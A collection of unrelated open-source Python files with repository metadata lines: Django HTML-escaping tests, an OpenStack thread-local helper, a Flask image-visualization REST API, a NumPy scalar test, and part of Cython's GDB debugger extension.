self.assertEqual(quote('http://example.com/?x=<>"\''), 'http://example.com/?x=%3C%3E%22%27')
self.assertEqual(quote('http://example.com/?q=http://example.com/?x=1%26q=django'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
self.assertEqual(quote('http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
def test_conditional_escape(self):
s = '<h1>interop</h1>'
self.assertEqual(html.conditional_escape(s),
'<h1>interop</h1>')
self.assertEqual(html.conditional_escape(safestring.mark_safe(s)), s)
def test_html_safe(self):
@html.html_safe
class HtmlClass:
def __str__(self):
return "<h1>I'm a html class!</h1>"
html_obj = HtmlClass()
self.assertTrue(hasattr(HtmlClass, '__html__'))
self.assertTrue(hasattr(html_obj, '__html__'))
self.assertEqual(force_text(html_obj), html_obj.__html__())
def test_html_safe_subclass(self):
class BaseClass:
def __html__(self):
# defines __html__ on its own
return 'some html content'
def __str__(self):
return 'some non html content'
@html.html_safe
class Subclass(BaseClass):
def __str__(self):
# overrides __str__ and is marked as html_safe
return 'some html safe content'
subclass_obj = Subclass()
self.assertEqual(force_text(subclass_obj), subclass_obj.__html__())
def test_html_safe_defines_html_error(self):
msg = "can't apply @html_safe to HtmlClass because it defines __html__()."
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass:
def __html__(self):
return "<h1>I'm a html class!</h1>"
def test_html_safe_doesnt_define_str(self):
msg = "can't apply @html_safe to HtmlClass because it doesn't define __str__()."
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass:
pass
| twz915/django | tests/utils_tests/test_html.py | Python | bsd-3-clause | 9,021 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Local storage of variables using weak references"""
import threading
import weakref
class WeakLocal(threading.local):
def __getattribute__(self, attr):
rval = super(WeakLocal, self).__getattribute__(attr)
if rval:
# NOTE(mikal): this bit is confusing. What is stored is a weak
# reference, not the value itself. We therefore need to lookup
# the weak reference and return the inner value here.
rval = rval()
return rval
def __setattr__(self, attr, value):
value = weakref.ref(value)
return super(WeakLocal, self).__setattr__(attr, value)
# NOTE(mikal): the name "store" should be deprecated in the future
store = WeakLocal()
# A "weak" store uses weak references and allows an object to fall out of scope
# when it falls out of scope in the code that uses the thread local storage. A
# "strong" store will hold a reference to the object so that it never falls out
# of scope.
weak_store = WeakLocal()
strong_store = threading.local()
| kickstandproject/wildcard | wildcard/openstack/common/local.py | Python | apache-2.0 | 1,722 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2017 Merantix GmbH
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Jan Steinke - Restful API
###############################################################################
"""Flask blueprint for accessing and manipulating image ressources
This is used by the main flask application to provide a REST API.
"""
import os
import shutil
import logging
from tempfile import mkdtemp
from PIL import Image
from werkzeug.utils import secure_filename
from flask import (
Blueprint,
current_app,
jsonify,
session,
request,
send_from_directory)
from picasso import __version__
from picasso.utils import (
get_app_state,
get_visualizations
)
API = Blueprint('api', __name__)
logger = logging.getLogger(__name__)
@API.before_request
def initialize_new_session():
"""Check session and initialize if necessary
Before every request, check the user session. If no session exists, add
one and provide temporary locations for images
"""
if 'image_uid_counter' in session and 'image_list' in session:
logger.debug('images are already being tracked')
else:
# reset image list counter for the session
session['image_uid_counter'] = 0
session['image_list'] = []
if 'img_input_dir' in session and 'img_output_dir' in session:
logger.debug('temporary image directories already exist')
else:
# make image upload directory
session['img_input_dir'] = mkdtemp()
session['img_output_dir'] = mkdtemp()
@API.route('/', methods=['GET'])
def root():
"""The root of the REST API
displays a hello world message.
"""
return jsonify(message='Picasso {version}. '
'See API documentation at: '
'https://picasso.readthedocs.io/en/latest/api.html'
.format(version=__version__),
version=__version__)
@API.route('/app_state', methods=['GET'])
def app_state():
state = get_app_state()
return jsonify(state)
@API.route('/images', methods=['POST', 'GET'])
def images():
"""Upload images via REST interface
Check if file upload was successful and sanatize user input.
TODO: return file URL instead of filename
"""
if request.method == 'POST':
file_upload = request.files['file']
if file_upload:
image = dict()
image['filename'] = secure_filename(file_upload.filename)
full_path = os.path.join(session['img_input_dir'],
image['filename'])
file_upload.save(full_path)
image['uid'] = session['image_uid_counter']
session['image_uid_counter'] += 1
current_app.logger.debug('File %d is saved as %s',
image['uid'],
image['filename'])
session['image_list'].append(image)
return jsonify(ok="true", file=image['filename'], uid=image['uid'])
return jsonify(ok="false")
if request.method == 'GET':
return jsonify(images=session['image_list'])
@API.route('/visualizers', methods=['GET'])
def visualizers():
"""Get a list of available visualizers
Responses with a JSON list of available visualizers
"""
list_of_visualizers = []
for visualizer in get_visualizations():
list_of_visualizers.append({'name': visualizer})
return jsonify(visualizers=list_of_visualizers)
@API.route('/visualizers/<vis_name>', methods=['GET'])
def visualizers_information(vis_name):
vis = get_visualizations()[vis_name]
return jsonify(settings=vis.ALLOWED_SETTINGS)
@API.route('/visualize', methods=['GET'])
def visualize():
"""Trigger a visualization via the REST API
Takes a single image and generates the visualization data, returning the
output exactly as given by the target visualization.
"""
session['settings'] = {}
image_uid = request.args.get('image')
vis_name = request.args.get('visualizer')
vis = get_visualizations()[vis_name]
if vis.ALLOWED_SETTINGS:
for key in vis.ALLOWED_SETTINGS.keys():
if request.args.get(key) is not None:
session['settings'][key] = request.args.get(key)
else:
session['settings'][key] = vis.ALLOWED_SETTINGS[key][0]
else:
logger.debug('Selected Visualizer {0} has no settings.'.format(vis_name))
inputs = []
for image in session['image_list']:
if image['uid'] == int(image_uid):
full_path = os.path.join(session['img_input_dir'],
image['filename'])
entry = dict()
entry['filename'] = image['filename']
entry['data'] = Image.open(full_path)
inputs.append(entry)
vis.update_settings(session['settings'])
output = vis.make_visualization(
inputs, output_dir=session['img_output_dir'])
return jsonify(output[0])
@API.route('/reset', methods=['GET'])
def reset():
"""Delete the session and clear temporary directories
"""
shutil.rmtree(session['img_input_dir'])
shutil.rmtree(session['img_output_dir'])
session.clear()
return jsonify(ok='true')
@API.route('/inputs/<filename>')
def download_inputs(filename):
"""For serving input images"""
return send_from_directory(session['img_input_dir'],
filename)
@API.route('/outputs/<filename>')
def download_outputs(filename):
"""For serving output images"""
return send_from_directory(session['img_output_dir'],
filename)
@API.errorhandler(500)
def internal_server_error(e):
return jsonify(ok=False, error=e, code=500), 500
@API.errorhandler(404)
def not_found_error(e):
return jsonify(ok=False, error=e, code=404), 404
| merantix/picasso | picasso/interfaces/rest.py | Python | epl-1.0 | 6,191 |
# -*- coding: utf-8 -*-
""" Test printing of scalar types.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_
class A(object):
pass
class B(A, np.float64):
pass
class C(B):
pass
class D(C, B):
pass
class B0(np.float64, A):
pass
class C0(B0):
pass
class TestInherit(TestCase):
def test_init(self):
x = B(1.0)
assert_(str(x) == '1.0')
y = C(2.0)
assert_(str(y) == '2.0')
z = D(3.0)
assert_(str(z) == '3.0')
def test_init2(self):
x = B0(1.0)
assert_(str(x) == '1.0')
y = C0(2.0)
assert_(str(y) == '2.0')
if __name__ == "__main__":
run_module_suite()
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/numpy/core/tests/test_scalarinherit.py | Python | mit | 771 |
"""
GDB extension that adds Cython support.
"""
from __future__ import print_function
try:
input = raw_input
except NameError:
pass
import sys
import textwrap
import traceback
import functools
import itertools
import collections
import gdb
try: # python 2
UNICODE = unicode
BYTES = str
except NameError: # python 3
UNICODE = str
BYTES = bytes
try:
from lxml import etree
have_lxml = True
except ImportError:
have_lxml = False
try:
# Python 2.5
from xml.etree import cElementTree as etree
except ImportError:
try:
# Python 2.5
from xml.etree import ElementTree as etree
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree
except ImportError:
# normal ElementTree install
import elementtree.ElementTree as etree
try:
import pygments.lexers
import pygments.formatters
except ImportError:
pygments = None
sys.stderr.write("Install pygments for colorized source code.\n")
if hasattr(gdb, 'string_to_argv'):
from gdb import string_to_argv
else:
from shlex import split as string_to_argv
from Cython.Debugger import libpython
# C or Python type
CObject = 'CObject'
PythonObject = 'PythonObject'
_data_types = dict(CObject=CObject, PythonObject=PythonObject)
_filesystemencoding = sys.getfilesystemencoding() or 'UTF-8'
# decorators
def dont_suppress_errors(function):
"*sigh*, readline"
@functools.wraps(function)
def wrapper(*args, **kwargs):
try:
return function(*args, **kwargs)
except Exception:
traceback.print_exc()
raise
return wrapper
def default_selected_gdb_frame(err=True):
def decorator(function):
@functools.wraps(function)
def wrapper(self, frame=None, *args, **kwargs):
try:
frame = frame or gdb.selected_frame()
except RuntimeError:
raise gdb.GdbError("No frame is currently selected.")
if err and frame.name() is None:
raise NoFunctionNameInFrameError()
return function(self, frame, *args, **kwargs)
return wrapper
return decorator
def require_cython_frame(function):
@functools.wraps(function)
@require_running_program
def wrapper(self, *args, **kwargs):
frame = kwargs.get('frame') or gdb.selected_frame()
if not self.is_cython_function(frame):
raise gdb.GdbError('Selected frame does not correspond with a '
'Cython function we know about.')
return function(self, *args, **kwargs)
return wrapper
def dispatch_on_frame(c_command, python_command=None):
def decorator(function):
@functools.wraps(function)
def wrapper(self, *args, **kwargs):
is_cy = self.is_cython_function()
is_py = self.is_python_function()
if is_cy or (is_py and not python_command):
function(self, *args, **kwargs)
elif is_py:
gdb.execute(python_command)
elif self.is_relevant_function():
gdb.execute(c_command)
else:
raise gdb.GdbError("Not a function cygdb knows about. "
"Use the normal GDB commands instead.")
return wrapper
return decorator
def require_running_program(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
try:
gdb.selected_frame()
except RuntimeError:
raise gdb.GdbError("No frame is currently selected.")
return function(*args, **kwargs)
return wrapper
def gdb_function_value_to_unicode(function):
@functools.wraps(function)
def wrapper(self, string, *args, **kwargs):
if isinstance(string, gdb.Value):
string = string.string()
return function(self, string, *args, **kwargs)
return wrapper
# Classes that represent the debug information
# Don't rename the parameters of these classes, they come directly from the XML
class CythonModule(object):
def __init__(self, module_name, filename, c_filename):
self.name = module_name
self.filename = filename
self.c_filename = c_filename
self.globals = {}
# {cython_lineno: min(c_linenos)}
self.lineno_cy2c = {}
# {c_lineno: cython_lineno}
self.lineno_c2cy = {}
self.functions = {}
class CythonVariable(object):
def __init__(self, name, cname, qualified_name, type, lineno):
self.name = name
self.cname = cname
self.qualified_name = qualified_name
self.type = type
self.lineno = int(lineno)
class CythonFunction(CythonVariable):
def __init__(self,
module,
name,
cname,
pf_cname,
qualified_name,
lineno,
type=CObject,
is_initmodule_function="False"):
super(CythonFunction, self).__init__(name,
cname,
qualified_name,
type,
lineno)
self.module = module
self.pf_cname = pf_cname
self.is_initmodule_function = is_initmodule_function == "True"
self.locals = {}
self.arguments = []
self.step_into_functions = set()
# General purpose classes
class CythonBase(object):
@default_selected_gdb_frame(err=False)
def is_cython_function(self, frame):
return frame.name() in self.cy.functions_by_cname
@default_selected_gdb_frame(err=False)
def is_python_function(self, frame):
"""
Tells if a frame is associated with a Python function.
If we can't read the Python frame information, don't regard it as such.
"""
if frame.name() == 'PyEval_EvalFrameEx':
pyframe = libpython.Frame(frame).get_pyop()
return pyframe and not pyframe.is_optimized_out()
return False
@default_selected_gdb_frame()
def get_c_function_name(self, frame):
return frame.name()
@default_selected_gdb_frame()
def get_c_lineno(self, frame):
return frame.find_sal().line
@default_selected_gdb_frame()
def get_cython_function(self, frame):
result = self.cy.functions_by_cname.get(frame.name())
if result is None:
raise NoCythonFunctionInFrameError()
return result
@default_selected_gdb_frame()
def get_cython_lineno(self, frame):
"""
Get the current Cython line number. Returns 0 if there is no
correspondence between the C and Cython code.
"""
cyfunc = self.get_cython_function(frame)
return cyfunc.module.lineno_c2cy.get(self.get_c_lineno(frame), 0)
@default_selected_gdb_frame()
def get_source_desc(self, frame):
filename = lineno = lexer = None
if self.is_cython_function(frame):
filename = self.get_cython_function(frame).module.filename
lineno = self.get_cython_lineno(frame)
if pygments:
lexer = pygments.lexers.CythonLexer(stripall=False)
elif self.is_python_function(frame):
pyframeobject = libpython.Frame(frame).get_pyop()
if not pyframeobject:
raise gdb.GdbError(
'Unable to read information on python frame')
filename = pyframeobject.filename()
lineno = pyframeobject.current_line_num()
if pygments:
lexer = pygments.lexers.PythonLexer(stripall=False)
else:
symbol_and_line_obj = frame.find_sal()
if not symbol_and_line_obj or not symbol_and_line_obj.symtab:
filename = None
lineno = 0
else:
filename = symbol_and_line_obj.symtab.fullname()
lineno = symbol_and_line_obj.line
if pygments:
lexer = pygments.lexers.CLexer(stripall=False)
return SourceFileDescriptor(filename, lexer), lineno
@default_selected_gdb_frame()
def get_source_line(self, frame):
source_desc, lineno = self.get_source_desc()
return source_desc.get_source(lineno)
@default_selected_gdb_frame()
def is_relevant_function(self, frame):
"""
returns whether we care about a frame on the user-level when debugging
Cython code
"""
name = frame.name()
older_frame = frame.older()
if self.is_cython_function(frame) or self.is_python_function(frame):
return True
elif older_frame and self.is_cython_function(older_frame):
# check for direct C function call from a Cython function
cython_func = self.get_cython_function(older_frame)
return name in cython_func.step_into_functions
return False
@default_selected_gdb_frame(err=False)
def print_stackframe(self, frame, index, is_c=False):
"""
Print a C, Cython or Python stack frame and the line of source code
if available.
"""
# do this to prevent the require_cython_frame decorator from
# raising GdbError when calling self.cy.cy_cvalue.invoke()
selected_frame = gdb.selected_frame()
frame.select()
try:
source_desc, lineno = self.get_source_desc(frame)
except NoFunctionNameInFrameError:
print('#%-2d Unknown Frame (compile with -g)' % index)
return
if not is_c and self.is_python_function(frame):
pyframe = libpython.Frame(frame).get_pyop()
if pyframe is None or pyframe.is_optimized_out():
# print this python function as a C function
return self.print_stackframe(frame, index, is_c=True)
func_name = pyframe.co_name
func_cname = 'PyEval_EvalFrameEx'
func_args = []
elif self.is_cython_function(frame):
cyfunc = self.get_cython_function(frame)
f = lambda arg: self.cy.cy_cvalue.invoke(arg, frame=frame)
func_name = cyfunc.name
func_cname = cyfunc.cname
func_args = [] # [(arg, f(arg)) for arg in cyfunc.arguments]
else:
source_desc, lineno = self.get_source_desc(frame)
func_name = frame.name()
func_cname = func_name
func_args = []
try:
gdb_value = gdb.parse_and_eval(func_cname)
except RuntimeError:
func_address = 0
else:
func_address = gdb_value.address
if not isinstance(func_address, int):
# Seriously? Why is the address not an int?
if not isinstance(func_address, (str, bytes)):
func_address = str(func_address)
func_address = int(func_address.split()[0], 0)
a = ', '.join('%s=%s' % (name, val) for name, val in func_args)
sys.stdout.write('#%-2d 0x%016x in %s(%s)' % (index, func_address, func_name, a))
if source_desc.filename is not None:
sys.stdout.write(' at %s:%s' % (source_desc.filename, lineno))
sys.stdout.write('\n')
try:
sys.stdout.write(' ' + source_desc.get_source(lineno))
except gdb.GdbError:
pass
selected_frame.select()
def get_remote_cython_globals_dict(self):
m = gdb.parse_and_eval('__pyx_m')
try:
PyModuleObject = gdb.lookup_type('PyModuleObject')
except RuntimeError:
raise gdb.GdbError(textwrap.dedent("""\
Unable to lookup type PyModuleObject, did you compile python
with debugging support (-g)?"""))
m = m.cast(PyModuleObject.pointer())
return m['md_dict']
def get_cython_globals_dict(self):
"""
Get the Cython globals dict where the remote names are turned into
local strings.
"""
remote_dict = self.get_remote_cython_globals_dict()
pyobject_dict = libpython.PyObjectPtr.from_pyobject_ptr(remote_dict)
result = {}
seen = set()
for k, v in pyobject_dict.items():
result[k.proxyval(seen)] = v
return result
def print_gdb_value(self, name, value, max_name_length=None, prefix=''):
if libpython.pretty_printer_lookup(value):
typename = ''
else:
typename = '(%s) ' % (value.type,)
if max_name_length is None:
print('%s%s = %s%s' % (prefix, name, typename, value))
else:
print('%s%-*s = %s%s' % (prefix, max_name_length, name, typename, value))
def is_initialized(self, cython_func, local_name):
cyvar = cython_func.locals[local_name]
cur_lineno = self.get_cython_lineno()
if '->' in cyvar.cname:
# Closed over free variable
if cur_lineno > cython_func.lineno:
if cyvar.type == PythonObject:
return int(gdb.parse_and_eval(cyvar.cname))
return True
return False
return cur_lineno > cyvar.lineno
class SourceFileDescriptor(object):
def __init__(self, filename, lexer, formatter=None):
self.filename = filename
self.lexer = lexer
self.formatter = formatter
def valid(self):
return self.filename is not None
def lex(self, code):
if pygments and self.lexer and parameters.colorize_code:
bg = parameters.terminal_background.value
if self.formatter is None:
formatter = pygments.formatters.TerminalFormatter(bg=bg)
else:
formatter = self.formatter
return pygments.highlight(code, self.lexer, formatter)
return code
def _get_source(self, start, stop, lex_source, mark_line, lex_entire):
with open(self.filename) as f:
# to provide "correct" colouring, the entire code needs to be
# lexed. However, this makes a lot of things terribly slow, so
# we decide not to. Besides, it's unlikely to matter.
if lex_source and lex_entire:
f = self.lex(f.read()).splitlines()
slice = itertools.islice(f, start - 1, stop - 1)
for idx, line in enumerate(slice):
if start + idx == mark_line:
prefix = '>'
else:
prefix = ' '
if lex_source and not lex_entire:
line = self.lex(line)
yield '%s %4d %s' % (prefix, start + idx, line.rstrip())
def get_source(self, start, stop=None, lex_source=True, mark_line=0,
lex_entire=False):
exc = gdb.GdbError('Unable to retrieve source code')
if not self.filename:
raise exc
start = max(start, 1)
if stop is None:
stop = start + 1
try:
return '\n'.join(
self._get_source(start, stop, lex_source, mark_line, lex_entire))
except IOError:
raise exc
# Errors
class CyGDBError(gdb.GdbError):
"""
Base class for Cython-command related erorrs
"""
def __init__(self, *args):
args = args or (self.msg,)
super(CyGDBError, self).__init__(*args)
class NoCythonFunctionInFrameError(CyGDBError):
"""
raised when the user requests the current cython function, which is
unavailable
"""
msg = "Current function is a function cygdb doesn't know about"
class NoFunctionNameInFrameError(NoCythonFunctionInFrameError):
"""
raised when the name of the C function could not be determined
in the current C stack frame
"""
msg = ('C function name could not be determined in the current C stack '
'frame')
# Parameters
class CythonParameter(gdb.Parameter):
"""
Base class for cython parameters
"""
def __init__(self, name, command_class, parameter_class, default=None):
self.show_doc = self.set_doc = self.__class__.__doc__
super(CythonParameter, self).__init__(name, command_class,
parameter_class)
if default is not None:
self.value = default
def __bool__(self):
return bool(self.value)
__nonzero__ = __bool__ # Python 2
class CompleteUnqualifiedFunctionNames(CythonParameter):
"""
Have 'cy break' complete unqualified function or method names.
"""
class ColorizeSourceCode(CythonParameter):
"""
Tell cygdb whether to colorize source code.
"""
class TerminalBackground(CythonParameter):
"""
Tell cygdb about the user's terminal background (light or dark).
"""
class CythonParameters(object):
"""
Simple container class that might get more functionality in the distant
future (mostly to remind us that we're dealing with parameters).
"""
def __init__(self):
self.complete_unqualified = CompleteUnqualifiedFunctionNames(
'cy_complete_unqualified',
gdb.COMMAND_BREAKPOINTS,
gdb.PARAM_BOOLEAN,
True)
self.colorize_code = ColorizeSourceCode(
'cy_colorize_code',
gdb.COMMAND_FILES,
gdb.PARAM_BOOLEAN,
True)
self.terminal_background = TerminalBackground(
'cy_terminal_background_color',
gdb.COMMAND_FILES,
gdb.PARAM_STRING,
"dark")
parameters = CythonParameters()
# Commands
class CythonCommand(gdb.Command, CythonBase):
"""
Base class for Cython commands
"""
command_class = gdb.COMMAND_NONE
@classmethod
def _register(cls, clsname, args, kwargs):
if not hasattr(cls, 'completer_class'):
return cls(clsname, cls.command_class, *args, **kwargs)
else:
return cls(clsname, cls.command_class, cls.completer_class,
*args, **kwargs)
@classmethod
def register(cls, *args, **kwargs):
alias = getattr(cls, 'alias', None)
if alias:
cls._register(cls.alias, args, kwargs)
return cls._register(cls.name, args, kwargs)
class CyCy(CythonCommand):
"""
Invoke a Cython command. Available commands are:
cy import
cy break
cy step
cy next
cy run
cy cont
cy finish
cy up
cy down
cy select
cy bt / cy backtrace
cy list
cy print
cy set
cy locals
cy globals
cy exec
"""
name = 'cy'
command_class = gdb.COMMAND_NONE
completer_class = gdb.COMPLETE_COMMAND
def __init__(self, name, command_class, completer_class):
# keep the signature 2.5 compatible (i.e. do not use f(*a, k=v)
super(CythonCommand, self).__init__(name, command_class,
completer_class, prefix=True)
commands = dict(
# GDB commands
import_ = CyImport.register(),
break_ = CyBreak.register(),
step = CyStep.register(),
next = CyNext.register(),
run = CyRun.register(),
cont = CyCont.register(),
finish = CyFinish.register(),
up = CyUp.register(),
down = CyDown.register(),
select = CySelect.register(),
bt = CyBacktrace.register(),
list = CyList.register(),
print_ = CyPrint.register(),
locals = CyLocals.register(),
globals = CyGlobals.register(),
exec_ = libpython.FixGdbCommand('cy exec', '-cy-exec'),
_exec = CyExec.register(),
set = CySet.register(),
# GDB functions
cy_cname = CyCName('cy_cname'),
cy_cvalue = CyCValue('cy_cvalue'),
cy_lineno = CyLine('cy_lineno'),
cy_eval = CyEval('cy_eval'),
)
for command_name, command in commands.items():
command.cy = self
setattr(self, command_name, command)
self.cy = self
# Cython module namespace
self.cython_namespace = {}
# maps (unique) qualified function names (e.g.
# cythonmodule.ClassName.method_name) to the CythonFunction object
self.functions_by_qualified_name = {}
# unique cnames of Cython functions
self.functions_by_cname = {}
# map function names like method_name to a list of all such
# CythonFunction objects
self.functions_by_name = collections.defaultdict(list)
class CyImport(CythonCommand):
"""
Import debug information outputted by the Cython compiler
Example: cy import FILE...
"""
name = 'cy import'
command_class = gdb.COMMAND_STATUS
completer_class = gdb.COMPLETE_FILENAME
def invoke(self, args, from_tty):
if isinstance(args, BYTES):
args = args.decode(_filesystemencoding)
for arg in string_to_argv(args):
try:
f = open(arg)
except OSError as e:
raise gdb.GdbError('Unable to open file %r: %s' % (args, e.args[1]))
t = etree.parse(f)
for module in t.getroot():
cython_module = CythonModule(**module.attrib)
self.cy.cython_namespace[cython_module.name] = cython_module
for variable in module.find('Globals'):
d = variable.attrib
cython_module.globals[d['name']] = CythonVariable(**d)
for function in module.find('Functions'):
cython_function = CythonFunction(module=cython_module,
**function.attrib)
# update the global function mappings
name = cython_function.name
qname = cython_function.qualified_name
self.cy.functions_by_name[name].append(cython_function)
self.cy.functions_by_qualified_name[
cython_function.qualified_name] = cython_function
self.cy.functions_by_cname[
cython_function.cname] = cython_function
d = cython_module.functions[qname] = cython_function
for local in function.find('Locals'):
d = local.attrib
cython_function.locals[d['name']] = CythonVariable(**d)
for step_into_func in function.find('StepIntoFunctions'):
d = step_into_func.attrib
cython_function.step_into_functions.add(d['name'])
cython_function.arguments.extend(
funcarg.tag for funcarg in function.find('Arguments'))
for marker in module.find('LineNumberMapping'):
cython_lineno = int(marker.attrib['cython_lineno'])
c_linenos = list(map(int, marker.attrib['c_linenos'].split()))
cython_module.lineno_cy2c[cython_lineno] = min(c_linenos)
for c_lineno in c_linenos:
cython_module.lineno_c2cy[c_lineno] = cython_lineno
class CyBreak(CythonCommand):
"""
Set a breakpoint for Cython code using Cython qualified name notation, e.g.:
cy break cython_modulename.ClassName.method_name...
or normal notation:
cy break function_or_method_name...
or for a line number:
cy break cython_module:lineno...
Set a Python breakpoint:
Break on any function or method named 'func' in module 'modname'
cy break -p modname.func...
Break on any function or method named 'func'
cy break -p func...
"""
name = 'cy break'
command_class = gdb.COMMAND_BREAKPOINTS
def _break_pyx(self, name):
modulename, _, lineno = name.partition(':')
lineno = int(lineno)
if modulename:
cython_module = self.cy.cython_namespace[modulename]
else:
cython_module = self.get_cython_function().module
if lineno in cython_module.lineno_cy2c:
c_lineno = cython_module.lineno_cy2c[lineno]
breakpoint = '%s:%s' % (cython_module.c_filename, c_lineno)
gdb.execute('break ' + breakpoint)
else:
raise gdb.GdbError("Not a valid line number. "
"Does it contain actual code?")
def _break_funcname(self, funcname):
func = self.cy.functions_by_qualified_name.get(funcname)
if func and func.is_initmodule_function:
func = None
break_funcs = [func]
if not func:
funcs = self.cy.functions_by_name.get(funcname) or []
funcs = [f for f in funcs if not f.is_initmodule_function]
if not funcs:
gdb.execute('break ' + funcname)
return
if len(funcs) > 1:
# multiple functions, let the user pick one
print('There are multiple such functions:')
for idx, func in enumerate(funcs):
print('%3d) %s' % (idx, func.qualified_name))
while True:
try:
result = input(
"Select a function, press 'a' for all "
"functions or press 'q' or '^D' to quit: ")
except EOFError:
return
else:
if result.lower() == 'q':
return
elif result.lower() == 'a':
break_funcs = funcs
break
elif (result.isdigit() and
0 <= int(result) < len(funcs)):
break_funcs = [funcs[int(result)]]
break
else:
print('Not understood...')
else:
break_funcs = [funcs[0]]
for func in break_funcs:
gdb.execute('break %s' % func.cname)
if func.pf_cname:
gdb.execute('break %s' % func.pf_cname)
def invoke(self, function_names, from_tty):
if isinstance(function_names, BYTES):
function_names = function_names.decode(_filesystemencoding)
argv = string_to_argv(function_names)
if function_names.startswith('-p'):
argv = argv[1:]
python_breakpoints = True
else:
python_breakpoints = False
for funcname in argv:
if python_breakpoints:
gdb.execute('py-break %s' % funcname)
elif ':' in funcname:
self._break_pyx(funcname)
else:
self._break_funcname(funcname)
@dont_suppress_errors
def complete(self, text, word):
# Filter init-module functions (breakpoints can be set using
# modulename:linenumber).
names = [n for n, L in self.cy.functions_by_name.items()
if any(not f.is_initmodule_function for f in L)]
qnames = [n for n, f in self.cy.functions_by_qualified_name.items()
if not f.is_initmodule_function]
if parameters.complete_unqualified:
all_names = itertools.chain(qnames, names)
else:
all_names = qnames
words = text.strip().split()
if not words or '.' not in words[-1]:
# complete unqualified
seen = set(text[:-len(word)].split())
return [n for n in all_names
if n.startswith(word) and n not in seen]
# complete qualified name
lastword = words[-1]
compl = [n for n in qnames if n.startswith(lastword)]
if len(lastword) > len(word):
# readline sees something (e.g. a '.') as a word boundary, so don't
# "recomplete" this prefix
strip_prefix_length = len(lastword) - len(word)
compl = [n[strip_prefix_length:] for n in compl]
return compl
class CythonInfo(CythonBase, libpython.PythonInfo):
"""
Implementation of the interface dictated by libpython.LanguageInfo.
"""
def lineno(self, frame):
# Take care of the Python and Cython levels. We need to care for both
# as we can't simply dispath to 'py-step', since that would work for
# stepping through Python code, but it would not step back into Cython-
# related code. The C level should be dispatched to the 'step' command.
if self.is_cython_function(frame):
return self.get_cython_lineno(frame)
return super(CythonInfo, self).lineno(frame)
def get_source_line(self, frame):
try:
line = super(CythonInfo, self).get_source_line(frame)
except gdb.GdbError:
return None
else:
return line.strip() or None
def exc_info(self, frame):
if self.is_python_function:
return super(CythonInfo, self).exc_info(frame)
def runtime_break_functions(self):
if self.is_cython_function():
return self.get_cython_function().step_into_functions
return ()
def static_break_functions(self):
result = ['PyEval_EvalFrameEx']
result.extend(self.cy.functions_by_cname)
return result
class CythonExecutionControlCommand(CythonCommand,
libpython.ExecutionControlCommandBase):
@classmethod
def register(cls):
return cls(cls.name, cython_info)
class CyStep(CythonExecutionControlCommand, libpython.PythonStepperMixin):
"Step through Cython, Python or C code."
name = 'cy -step'
stepinto = True
def invoke(self, args, from_tty):
if self.is_python_function():
self.python_step(self.stepinto)
elif not self.is_cython_function():
if self.stepinto:
command = 'step'
else:
command = 'next'
self.finish_executing(gdb.execute(command, to_string=True))
else:
self.step(stepinto=self.stepinto)
class CyNext(CyStep):
"Step-over Cython, Python or C code."
name = 'cy -next'
stepinto = False
class CyRun(CythonExecutionControlCommand):
"""
Run a Cython program. This is like the 'run' command, except that it
displays Cython or Python source lines as well
"""
name = 'cy run'
invoke = CythonExecutionControlCommand.run
class CyCont(CythonExecutionControlCommand):
"""
Continue a Cython program. This is like the 'run' command, except that it
displays Cython or Python source lines as well.
"""
name = 'cy cont'
invoke = CythonExecutionControlCommand.cont
class CyFinish(CythonExecutionControlCommand):
"""
Execute until the function returns.
"""
name = 'cy finish'
invoke = CythonExecutionControlCommand.finish
class CyUp(CythonCommand):
"""
Go up a Cython, Python or relevant C frame.
"""
name = 'cy up'
_command = 'up'
def invoke(self, *args):
try:
gdb.execute(self._command, to_string=True)
while not self.is_relevant_function(gdb.selected_frame()):
gdb.execute(self._command, to_string=True)
except RuntimeError as e:
raise gdb.GdbError(*e.args)
frame = gdb.selected_frame()
index = 0
while frame:
frame = frame.older()
index += 1
self.print_stackframe(index=index - 1)
class CyDown(CyUp):
"""
Go down a Cython, Python or relevant C frame.
"""
name = 'cy down'
_command = 'down'
class CySelect(CythonCommand):
"""
Select a frame. Use frame numbers as listed in `cy backtrace`.
This command is useful because `cy backtrace` prints a reversed backtrace.
"""
name = 'cy select'
def invoke(self, stackno, from_tty):
try:
stackno = int(stackno)
except ValueError:
raise gdb.GdbError("Not a valid number: %r" % (stackno,))
frame = gdb.selected_frame()
while frame.newer():
frame = frame.newer()
stackdepth = libpython.stackdepth(frame)
try:
gdb.execute('select %d' % (stackdepth - stackno - 1,))
except RuntimeError as e:
raise gdb.GdbError(*e.args)
class CyBacktrace(CythonCommand):
'Print the Cython stack'
name = 'cy bt'
alias = 'cy backtrace'
command_class = gdb.COMMAND_STACK
completer_class = gdb.COMPLETE_NONE
@require_running_program
def invoke(self, args, from_tty):
# get the first frame
frame = gdb.selected_frame()
while frame.older():
frame = frame.older()
print_all = args == '-a'
index = 0
while frame:
try:
is_relevant = self.is_relevant_function(frame)
except CyGDBError:
is_relevant = False
if print_all or is_relevant:
self.print_stackframe(frame, index)
index += 1
frame = frame.newer()
class CyList(CythonCommand):
"""
List Cython source code. To disable to customize colouring see the cy_*
parameters.
"""
name = 'cy list'
